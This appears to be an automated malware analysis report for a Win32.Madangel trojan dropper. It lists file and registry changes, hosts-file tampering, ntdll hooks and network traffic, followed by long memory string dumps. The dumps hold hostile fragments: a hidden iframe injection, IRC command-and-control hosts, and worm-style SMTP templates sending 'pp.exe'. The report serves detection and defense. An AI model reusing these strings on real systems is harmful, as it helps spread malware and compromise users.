Win32.Madangel.DIA_c9c282fda9

by malwarelabrobot on July 8th, 2017 in Malware Descriptions.

Win32.Madangel.DIA (BitDefender), Virus:Win32/Madang.A (Microsoft), Trojan-Dropper.Win32.Injector.pbuu (Kaspersky), Virus.Win32.Madang.a (v) (VIPRE), Win32.Virut.56 (DrWeb), Win32.Madangel.DIA (B) (Emsisoft), W32/Chir.gen!remnants (McAfee), W32.Madangel (Symantec), Virus.Win32.Sality (Ikarus), Win32.Madangel.DIA (FSecure), Win32:Madangel (AVG), Win32:Madangel (Avast), Win32.Madangel.DIA (AdAware), GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Virus


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: c9c282fda9cf61c630757001e7ef4964
SHA1: 070dc4501ad98feabd284d3c638b52daf13a17ea
SHA256: d8d7e1eafe5b754152af719d789977d898e753d2c71e0e11c9ea2bd29be377f2
SSDeep: 6144:5dGvgKIR08uBlCfVOAIpl 4vcHz9ek6Rz6oSDWIWAWq3yItL:n9KtL fVNID3Ueko6oSlNW6
Size: 237296 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2011-04-28 11:25:13
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:3404

The Trojan injects its code into the following process(es):

DrvUpdater.exe:812
%original file name%.exe:2604
%original file name%.exe:3380
Explorer.EXE:1440

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process DrvUpdater.exe:812 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\DrvUpdater.xml (113 bytes)

The process %original file name%.exe:2604 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\Serverx.exe (1504988 bytes)

The process %original file name%.exe:3404 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\DrvUpdater.Run.bat (127 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\DRPSu\DrvUpdater.exe (1281 bytes)

The process %original file name%.exe:3380 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\runouce.exe (1504988 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.exe (2360 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.exe (2904 bytes)

Registry activity

The process DrvUpdater.exe:812 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\DRPSu Updater]
"Publisher" = "DriverPack Solution"
"DisplayIcon" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\DRPSu\DrvUpdater.exe"
"DisplayVersion" = "0.0.25"
"DisplayName" = "DriverPack Solution Updater"
"HelpLink" = "http://drp.su/"
"UninstallString" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\DRPSu\DrvUpdater.exe /uninstall"

"NoModify" = "1"
"Version" = "0.0.25"
"InstallDate" = "20170707"
"InstallLocation" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\DRPSu"
"NoRepair" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"DrvUpdater" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\DRPSu\DrvUpdater.exe"

The process %original file name%.exe:2604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Serverx" = "C:\Windows\system32\Serverx.exe"

The process %original file name%.exe:3404 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process %original file name%.exe:3380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Runonce" = "C:\Windows\system32\runouce.exe"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 864 bytes in size. The following strings are added to the hosts file listed below:

127.0.0.1 ZieF.pl
127.0.0.1 validation.sls.microsoft.com


Rootkit activity

The Trojan installs the following user-mode hooks in ntdll.dll:

NtQueryInformationProcess
ZwOpenFile
ZwCreateUserProcess
ZwCreateProcessEx
NtCreateProcess
ZwCreateFile

Propagation

VersionInfo

Company Name:
Product Name: DRP Su Updater
Product Version: 0, 0, 25, 0
Legal Copyright: DriverPack Solution
Legal Trademarks:
Original Filename: DrvUpdater.exe
Internal Name: DRP Su Updater
File Version: 0, 0, 25, 0
File Description: DRP Su Updater
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 253952 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 258048 163840 161792 5.54268 f3f5b45947f34ffa3dac18b582129744
.rsrc 421888 74480 74480 4.8823 f232b663f872dcedba2ec222fd80bc79

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://update.drp.su/drpupdater/DrvUpdater.xml 13.69.79.106
irc.zief.pl 148.81.111.121
teredo.ipv6.microsoft.com


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN IRC Nick change on non-standard port
ET POLICY HTTP Request to .su TLD (Soviet Union) Often Malware Related

Traffic

NICK ovjvjlai.USER i020601 . . :#10f5f7edb Service Pack 1.JOIN #.364.




:irc 001 ovjvjlai :Hi virtu.:irc 376 ovjvjlai :End of /MOTD command.:i
rc 001 ovjvjlai :Hi virtu.:irc 376 ovjvjlai :End of /MOTD command..:ov
jvjlai JOIN #.364..:ovjvjlai JOIN #.364.



GET /drpupdater/DrvUpdater.xml HTTP/1.1
Host: update.drp.su
Accept: */*


HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Fri, 07 Jul 2017 02:43:30 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 113
Last-Modified: Fri, 03 Feb 2017 10:10:01 GMT
Connection: close
ETag: "589456f9-71"
GeoIP: UA
Accept-Ranges: bytes
<root>.<version value='0.0.25'>.    <file path='hXXp://
dev2.drp.su/download/DrvUpdater.exe' />.</version>.</root&
gt;..

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_2604:

.rsrc
m.Hv!
%f)EE
.kL{,w
2.whe'
4A.jq
uRlj
.lh2gxg
h%F?27
SG3s^6;".AFj1
2{"J~X .Fe|
1%0xO
*%U]R
D~.wE
.XIz*
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
KERNEL32.DLL
ADVAPI32.dll
GDI32.dll
MSIMG32.dll
SETUPAPI.dll
SHELL32.dll
USER32.dll
WS2_32.dll
RegOpenKeyA
ShellExecuteA
hXXp://VVV.usertrust.com1
3hXXp://crl.usertrust.com/AddTrustExternalCARoot.crl05
hXXp://ocsp.usertrust.com0
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl05
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl0t
1hXXp://crt.usertrust.com/UTNAddTrustObject_CA.crt0%
1094721
hXXps://secure.comodo.net/CPS0A
0hXXp://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
0hXXp://crt.comodoca.com/COMODOCodeSigningCA2.crt0$
hXXp://ocsp.comodoca.com0
info@drp.su0
hXXp://drp.su/0
USER32.DLL
ADVAPI32.DLL
MPR.DLL
WSOCK32.DLL
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinExec
RegNotifyChangeKeyValue
\runouce.exe
=.wabt!=.adct$=r.dbt
=.doct
=.xlst
=.exetS=.scrtL=.htmt
readme.eml
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
btamail.net.cn
HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO: %s
FROM: %s@yahoo.com
TO: %s
SUBJECT: %s is comming!
Content-Type: audio/x-wav; name="pp.exe"
.idata
.reloc
KERNEL32.dll
C7%D(
[L\-j}
SHELL32.DLL
hXXp://vguarder.91i.net/user.htm
hXXp://vguarder.bravehost.com/user.htm
\setupx.exe
\updatex.exe
\Serverx.exe
=.exet
=.scrt
0, 0, 25, 0
DrvUpdater.exe

%original file name%.exe_2604_rwx_0046D000_00001000:

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
KERNEL32.DLL
ADVAPI32.dll
GDI32.dll
MSIMG32.dll
SETUPAPI.dll
SHELL32.dll
USER32.dll
WS2_32.dll
RegOpenKeyA
ShellExecuteA
hXXp://VVV.usertrust.com1
3hXXp://crl.usertrust.com/AddTrustExternalCARoot.crl05
hXXp://ocsp.usertrust.com0
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl05

%original file name%.exe_2604_rwx_00478000_00002000:

KERNEL32.dll
USER32.DLL
ADVAPI32.DLL
MPR.DLL
WSOCK32.DLL
SHELL32.DLL
hXXp://vguarder.91i.net/user.htm
hXXp://vguarder.bravehost.com/user.htm
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinExec
RegNotifyChangeKeyValue
RegOpenKeyA
ShellExecuteA
\setupx.exe
\updatex.exe
\Serverx.exe
=.exet
=.scrt
.idata
.reloc

%original file name%.exe_3380:

.rsrc
m.Hv!
%f)EE
.kL{,w
2.whe'
4A.jq
uRlj
.lh2gxg
h%F?27
SG3s^6;".AFj1
2{"J~X .Fe|
1%0xO
*%U]R
D~.wE
.XIz*
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
KERNEL32.DLL
ADVAPI32.dll
GDI32.dll
MSIMG32.dll
SETUPAPI.dll
SHELL32.dll
USER32.dll
WS2_32.dll
RegOpenKeyA
ShellExecuteA
hXXp://VVV.usertrust.com1
3hXXp://crl.usertrust.com/AddTrustExternalCARoot.crl05
hXXp://ocsp.usertrust.com0
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl05
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl0t
1hXXp://crt.usertrust.com/UTNAddTrustObject_CA.crt0%
1094721
hXXps://secure.comodo.net/CPS0A
0hXXp://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
0hXXp://crt.comodoca.com/COMODOCodeSigningCA2.crt0$
hXXp://ocsp.comodoca.com0
info@drp.su0
hXXp://drp.su/0
USER32.DLL
ADVAPI32.DLL
MPR.DLL
WSOCK32.DLL
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinExec
RegNotifyChangeKeyValue
\runouce.exe
=.wabt!=.adct$=r.dbt
=.doct
=.xlst
=.exetS=.scrtL=.htmt
readme.eml
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
btamail.net.cn
HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO: %s
FROM: %s@yahoo.com
TO: %s
SUBJECT: %s is comming!
Content-Type: audio/x-wav; name="pp.exe"
.idata
.reloc
KERNEL32.dll
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Qoyirc.zief.pl
proxim.ircgalaxy.pl
NICK kqclujuk
SFC.DLL
SFC_OS.DLL
SHLWAPI.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 ZieF.pl
#<iframe src="hXXp://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>
SHELL32.DLL
hXXp://vguarder.91i.net/user.htm
hXXp://vguarder.bravehost.com/user.htm
\setupx.exe
\updatex.exe
\Serverx.exe
=.exet
=.scrt
0, 0, 25, 0
DrvUpdater.exe

DrvUpdater.exe_812:

`.rsrc
T$XRSShL$D
t%h(%D
DVPQRhh%D
E<h}%D
{4h}%D
O@It_ItSIt.It
D$<}%D
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
dhu2.iu
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
USER32.DLL
operator
portuguese-brazilian
.jpeg
.html
0123456789
&#xX;
</%s>
%s="%s"
%s='%s'
<!--%s-->
<![CDATA[%s]]>
version="%s"
encoding="%s"
standalone="%s"
/DrvUpdater.xml
0.0.25
\DrvUpdater.Update
\DrvUpdater.Update.bat
ping -n 1 127.0.0.1
start /D "%APPDATA%\DRPSu" DrvUpdater.exe
copy /Y /B "%TEMP%\DrvUpdater.Update" "%APPDATA%\DRPSu\DrvUpdater.exe"
del /F "%TEMP%\DrvUpdater.Update"
del /F "%TEMP%\DrvUpdater.Update.bat
url.dll,FileProtocolHandler hXXp://devid.drp.su/?l=ru&down=updater&dev=
url.dll,FileProtocolHandler hXXp://devid.drp.su/?l=en&down=updater&dev=
\DrvUpdater.exe
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Uninstall\DRPSu Updater
hXXp://drp.su/
/DrvUpdater.Uninstall.bat
/DrvUpdater.Run.bat
hXXp://update.drp.su/drpupdater/DrvUpdater.xml
Rundll32.exe
WARNING: failed to save cookies in %s
About to connect() to %s%s port %ld (#%ld)
Connected to %s (%s) port %ld (#%ld)
Protocol %s not supported or disabled in libcurl
[^:]:%[^
:]://%[^
<url> malformed
http_proxy
%5[^:@]:%5[^@]
:%5[^@]
[%*45[0123456789abcdefABCDEF:.]%c
;type=%c
%s://%s%s%s:%hu%s%s%s
Port number too large: %lu
Couldn't find host %s in the _netrc file; using defaults
PTF@example.com
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
%s://%s
Re-using existing connection! (#%ld) with host %s
User-Agent: %s
Connection #%ld to host %s left intact
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
getpeername() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
Could not set TCP_NODELAY: %s
TCP_NODELAY set
sa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Failed to connect to %s: %s
%s:%d
Send failure: %s
Recv failure: %s
[%s %s %s]
operation aborted by callback
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
HTTP server doesn't seem to support byte ranges. Cannot resume.
Received problem %d in the chunky parser
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Operation timed out after %ld milliseconds with %lld bytes received
%5[^:]:%d:%5s
Resolve %s found illegal!
Added %s:%d:%s to DNS cache
No URL set!
[^?&/:]://%c
Issue another request to this URL: '%s'
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
unspecified error %d
23[^;=]=I99[^;
skipped cookie with illegal dotcount domain: %s
skipped cookie with bad tailmatch domain: %s
I99[^;
httponly
#HttpOnly_
%s cookie %s="%s" for domain %s, path %s, expire %lld
%s%s%s
# Netscape HTTP Cookie File
# hXXp://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.
# Fatal libcurl error
%s:%s:%s
%s:%.*s
%s:%s
%s:%s:x:%s:%s:%s
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop="%s", response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%s, opaque="%s"
%s, algorithm="%s"
Internal error clearing splay node = %d
Internal error removing splay node = %d
--:--:--
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
Failed to resolve "%s" for SOCKS4 connect.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
USER %s
STARTTLS denied. %c
Access denied. %c
PASS %s
RETR %s
LIST %s
POP3S not supported!
login
password
%s LOGIN %s %s
%s SELECT %s
%s FETCH 1 BODY[TEXT]
%s STARTTLS
%s LOGOUT
IMAPS not supported!
SMTP
LOGIN
EHLO %s
HELO %s
No known auth mechanisms supported!
AUTH %s %s
AUTH %s
Access denied: %d
%s xxxxxxxxxxxxxxxx
Authentication failed: %d
MAIL FROM:%s
RCPT TO:%s
RCPT TO:<%s>
Got unexpected smtp-server response: %d
SMTPS not supported!
%sAuthorization: Basic %s
The requested URL returned error: %d
%s auth using %s with user '%s'
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
Host: %s
CONNECT %s:%hu HTTP/%s
%s%s%s%s
HTTP/1.%d %d
Received HTTP code %d from proxy after CONNECT
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Referer: %s
Accept-Encoding: %s
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s:%hu
PTF://
Range: bytes=%s
Content-Range: bytes %s%lld/%lld
Content-Range: bytes %s/%lld
PTF://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
HTTP/
Avoided giant realloc for header (max is %d)!
HTTP/%d.%d =
HTTP =
RTSP/%d.%d =
HTTP 1.0, assume close after body
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 connection set to keep alive!
Could not resolve proxy: %s; %s
Could not resolve host: %s; %s
init_resolve_thread() failed for %s; %s
getaddrinfo() failed for %s:%d; %s
Operation too slow. Less than %ld bytes/sec transfered the last %ld seconds
%d.%d.%d.%d
Unsupported protocol
URL using bad/illegal format or missing URL
FTP: weird server reply
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with known CA certificates
Problem with the SSL CA cert (path? access rights?)
Unrecognized HTTP Content-Encoding
Invalid LDAP URL
Issuer check against peer certificate failed
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Unable to parse FTP file list
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
d:d:d
d:d
%c%c==
%c%c%c=
%c%c%c%c
%s; boundary=%s
Content-Type: multipart/mixed, boundary=%s
Content-Disposition: attachment; filename="%s"
; filename="%s"
Content-Type: %s
couldn't open file "%s"
--%s--
d:\DRPSuUpdater\bin\Release\DrvUpdater.pdb
zcÁ
C:\Users\"%CurrentUserName%"\AppData\Roaming\DRPSu\DrvUpdater.exe
2/}'1~'0
GetProcessHeap
GetConsoleOutputCP
GetCPInfo
RegOpenKeyA
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
ShellExecuteA
ShellExecuteExA
1<' 3'$%
.text
`.rdata
@.data
.rsrc
@.reloc
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
KERNEL32.DLL
ADVAPI32.dll
GDI32.dll
MSIMG32.dll
SETUPAPI.dll
SHELL32.dll
USER32.dll
WS2_32.dll
hXXp://VVV.usertrust.com1
3hXXp://crl.usertrust.com/AddTrustExternalCARoot.crl05
hXXp://ocsp.usertrust.com0
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl05
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl0t
1hXXp://crt.usertrust.com/UTNAddTrustObject_CA.crt0%
1094721
hXXps://secure.comodo.net/CPS0A
0hXXp://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
0hXXp://crt.comodoca.com/COMODOCodeSigningCA2.crt0$
hXXp://ocsp.comodoca.com0
info@drp.su0
hXXp://drp.su/0
ADVAPI32.DLL
MPR.DLL
WSOCK32.DLL
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinExec
RegNotifyChangeKeyValue
\runouce.exe
=.wabt!=.adct$=r.dbt
=.doct
=.xlst
=.exetS=.scrtL=.htmt
readme.eml
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
btamail.net.cn
HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO: %s
FROM: %s@yahoo.com
TO: %s
SUBJECT: %s is comming!
Content-Type: audio/x-wav; name="pp.exe"
.idata
.reloc
KERNEL32.dll
C7%D(
[L\-j}
SHELL32.DLL
hXXp://vguarder.91i.net/user.htm
hXXp://vguarder.bravehost.com/user.htm
\setupx.exe
\updatex.exe
\Serverx.exe
=.exet
=.scrt
mscoree.dll
\DRPSu\DrvUpdater.exe
ntdll.dll
Windows
Windows has found a new device. Download and install a specific driver to enable the device.
<a>Use the Web service to download driver </a>
0, 0, 25, 0
DrvUpdater.exe

%original file name%.exe_3380_rwx_0046D000_0000B000:

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
KERNEL32.DLL
ADVAPI32.dll
GDI32.dll
MSIMG32.dll
SETUPAPI.dll
SHELL32.dll
USER32.dll
WS2_32.dll
RegOpenKeyA
ShellExecuteA
hXXp://VVV.usertrust.com1
3hXXp://crl.usertrust.com/AddTrustExternalCARoot.crl05
hXXp://ocsp.usertrust.com0
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl05
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl0t
1hXXp://crt.usertrust.com/UTNAddTrustObject_CA.crt0%
1094721
hXXps://secure.comodo.net/CPS0A
0hXXp://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
0hXXp://crt.comodoca.com/COMODOCodeSigningCA2.crt0$
hXXp://ocsp.comodoca.com0
info@drp.su0
hXXp://drp.su/0
USER32.DLL
ADVAPI32.DLL
MPR.DLL
WSOCK32.DLL
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinExec
RegNotifyChangeKeyValue
\runouce.exe
=.wabt!=.adct$=r.dbt
=.doct
=.xlst
=.exetS=.scrtL=.htmt
readme.eml
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
btamail.net.cn
HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO: %s
FROM: %s@yahoo.com
TO: %s
SUBJECT: %s is comming!
Content-Type: audio/x-wav; name="pp.exe"
.idata
.reloc
KERNEL32.dll
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Qoyirc.zief.pl
proxim.ircgalaxy.pl
NICK kqclujuk
SFC.DLL
SFC_OS.DLL
SHLWAPI.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 ZieF.pl
#<iframe src="hXXp://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>
SHELL32.DLL
hXXp://vguarder.91i.net/user.htm
hXXp://vguarder.bravehost.com/user.htm
\setupx.exe
\updatex.exe
\Serverx.exe
=.exet
=.scrt

DrvUpdater.exe_812_rwx_00401000_00064000:

T$XRSShL$D
t%h(%D
DVPQRhh%D
E<h}%D
{4h}%D
O@It_ItSIt.It
D$<}%D
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
dhu2.iu
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
USER32.DLL
operator
portuguese-brazilian
.jpeg
.html
0123456789
&#xX;
</%s>
%s="%s"
%s='%s'
<!--%s-->
<![CDATA[%s]]>
version="%s"
encoding="%s"
standalone="%s"
/DrvUpdater.xml
0.0.25
\DrvUpdater.Update
\DrvUpdater.Update.bat
ping -n 1 127.0.0.1
start /D "%APPDATA%\DRPSu" DrvUpdater.exe
copy /Y /B "%TEMP%\DrvUpdater.Update" "%APPDATA%\DRPSu\DrvUpdater.exe"
del /F "%TEMP%\DrvUpdater.Update"
del /F "%TEMP%\DrvUpdater.Update.bat
url.dll,FileProtocolHandler hXXp://devid.drp.su/?l=ru&down=updater&dev=
url.dll,FileProtocolHandler hXXp://devid.drp.su/?l=en&down=updater&dev=
\DrvUpdater.exe
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Uninstall\DRPSu Updater
hXXp://drp.su/
/DrvUpdater.Uninstall.bat
/DrvUpdater.Run.bat
hXXp://update.drp.su/drpupdater/DrvUpdater.xml
Rundll32.exe
WARNING: failed to save cookies in %s
About to connect() to %s%s port %ld (#%ld)
Connected to %s (%s) port %ld (#%ld)
Protocol %s not supported or disabled in libcurl
[^:]:%[^
:]://%[^
<url> malformed
http_proxy
%5[^:@]:%5[^@]
:%5[^@]
[%*45[0123456789abcdefABCDEF:.]%c
;type=%c
%s://%s%s%s:%hu%s%s%s
Port number too large: %lu
Couldn't find host %s in the _netrc file; using defaults
PTF@example.com
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
%s://%s
Re-using existing connection! (#%ld) with host %s
User-Agent: %s
Connection #%ld to host %s left intact
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
getpeername() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
Could not set TCP_NODELAY: %s
TCP_NODELAY set
sa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Failed to connect to %s: %s
%s:%d
Send failure: %s
Recv failure: %s
[%s %s %s]
operation aborted by callback
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
HTTP server doesn't seem to support byte ranges. Cannot resume.
Received problem %d in the chunky parser
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Operation timed out after %ld milliseconds with %lld bytes received
%5[^:]:%d:%5s
Resolve %s found illegal!
Added %s:%d:%s to DNS cache
No URL set!
[^?&/:]://%c
Issue another request to this URL: '%s'
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
unspecified error %d
23[^;=]=I99[^;
skipped cookie with illegal dotcount domain: %s
skipped cookie with bad tailmatch domain: %s
I99[^;
httponly
#HttpOnly_
%s cookie %s="%s" for domain %s, path %s, expire %lld
%s%s%s
# Netscape HTTP Cookie File
# hXXp://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.
